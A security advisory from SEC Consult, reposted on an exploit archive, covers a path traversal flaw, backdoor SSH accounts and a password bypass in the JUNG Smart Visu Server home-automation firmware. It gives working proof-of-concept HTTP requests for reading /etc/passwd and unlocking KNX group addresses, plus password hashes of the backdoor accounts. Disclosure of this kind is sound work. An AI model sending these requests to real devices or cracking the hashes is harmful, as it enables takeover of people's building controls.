Lucene search

K
zdtSec-consult1337DAY-ID-26926
HistoryFeb 07, 2017 - 12:00 a.m.

JUNG Smart Visu Server Multiple Vulnerabilities

2017-02-0700:00:00
sec-consult
0day.today
68

Exploit for hardware platform in category local exploits

title: Path Traversal, Backdoor accounts & KNX group address
password bypass
product: JUNG Smart Visu Server
vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
fixed version: Firmware v1.0.900
CVE number: -
impact: Critical
homepage: http://www.jung.de/
found: 2016-11-10
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"JUNG provides equipment and systems that win over by advanced technology,
sophisticated design, and a large variety of features. On the one hand,
our portfolio includes switches, socket outlets, dimmer, and observers.
On the other, it includes innovative systems for controlling features in
your home. From lighting, blind, or temperature control to wireless and
KNX technologies, door communication, and multimedia control, a large
range of applications is covered. In addition to comfort and security,
also the requirements regarding cost-effectiveness and energy efficiency
are met."

Source:http://www.jung.de/en/1828/company/company-portrait/


Business recommendation:
------------------------
Attackers are able to gain root access through SSH with the credentials of
the backdoor user account. A attacker can also unlock the group address
protection for the KNX device mapping.

JUNG has provided updated firmware which should be installed immediately.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path
traversal. This leads to full information disclosure of all files on the
system.

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to the Smart Visu Server via SSH.

3) Group Address (GA) unlock without Password
As protection functionality, the KNX group address can be locked with a
user-defined password. This password can be removed by using a single PUT
request. An attacker can completely change the configuration of the connected
devices (e.g. a light switch in the kitchen can be swapped with the air
conditioner).


Proof of concept:
-----------------
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the
following GET-Request:
------------------------------------ Request --------------------------------
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: <IP-Address>
[...]

----------------------------------- Response --------------------------------
HTTP/1.1 200 OK
Content-Disposition: inline;filename="passwd"
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-----------------------------------------------------------------------------

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to Smart Visu Server over SSH on Port 55555.

Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:99999:7:::
daemon:*:15914:0:99999:7:::
[...]
avahi:*:16541:0:99999:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:99999:7:::

3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which removes the
password:
------------------------------------ Request --------------------------------
PUT /rest/items/knxcom_datastore HTTP/1.1
Host: <IP-Address>
[...]

{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{"lock_ga":false}"]}
-----------------------------------------------------------------------------


Vulnerable / tested versions:
-----------------------------
Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be
vulnerable.


Vendor contact timeline:
------------------------
2016-11-21: Contacting vendor through kundencenter () jung de, mail.vka () jung de
2016-12-02: Initial phone call with vendor. Advisory sent as encrypted archive.
2016-12-16: Call with vendor. Patch will be available in January 2017.
2017-01-09: Call with vendor. Patch will be approximately available in CW4.
Release shifted to 2017-01-30.
2017-01-25: Call with vendor. Patch is stable in version 1.0.900 and will be
released on 2017-02-07 in CW5. Shifted release of advisory to
2017-02-07.
2017-02-07: Public release of advisory


Solution:
---------
Upgrade to firmware version 1.0.900 which is being provided by JUNG
through automatic updates.

#  0day.today [2018-01-04]  #